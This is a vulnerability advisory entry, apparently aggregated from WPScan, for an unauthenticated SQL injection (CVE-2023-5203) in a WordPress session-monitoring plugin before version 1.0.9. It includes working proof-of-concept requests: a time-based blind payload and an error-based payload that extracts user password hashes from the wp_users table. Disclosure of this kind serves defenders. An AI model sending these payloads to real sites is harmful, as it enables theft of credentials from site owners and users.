Lucene search
Nicolas SurribasWPVDB-ID:7F4F505B-2667-4E0F-9841-9C1CD0831932HistoryNov 30, 2023 - 12:00 a.m.
WP Sessions Time Monitoring Full Automatic < 1.0.9 - Unauthenticated SQL injection
2023-11-3000:00:00
Nicolas Surribas
wpscan.com
6
wordpress
sql injection
unauthenticated attack
data extraction
security plugin
Description The plugin does not sanitize the request URL or query parameters before using them in an SQL query, allowing unauthenticated attackers to extract sensitive data from the database via blind time based SQL injection techniques, or in some cases an error/union based technique.
PoC
Blind time based SQLi: GET /?test=1’%20AND%20(SELECT%208559%20FROM%20(SELECT(SLEEP(5)))WBVZ)%20-- HTTP/1.1 Error/union based SQLi (Requires MySQL and WP_DEBUG enabled): GET /?test=1%27%20AND%20GTID_SUBSET%28CONCAT%280x686173683a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28user_pass%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C190%29%20FROM%20%60wordpress%60.wp_users%20ORDER%20BY%20ID%20LIMIT%201%2C1%29%29%2C3124%29–%20a
| CPE | Name | Operator | Version |
|---|---|---|---|
| eq | 1.0.9 |
Related
wpexploit
wpexploit
nvd
nvd
CVE-2023-5203
2023-12-26 19:15:07
cve
cve
CVE-2023-5203
2023-12-26 19:15:07
cvelist
cvelist
prion
prion
Sql injection
2023-12-26 19:15:00
8 High
AI Score
Confidence
Low
0.002 Low
EPSS
Percentile
51.7%
Related for WPVDB-ID:7F4F505B-2667-4E0F-9841-9C1CD0831932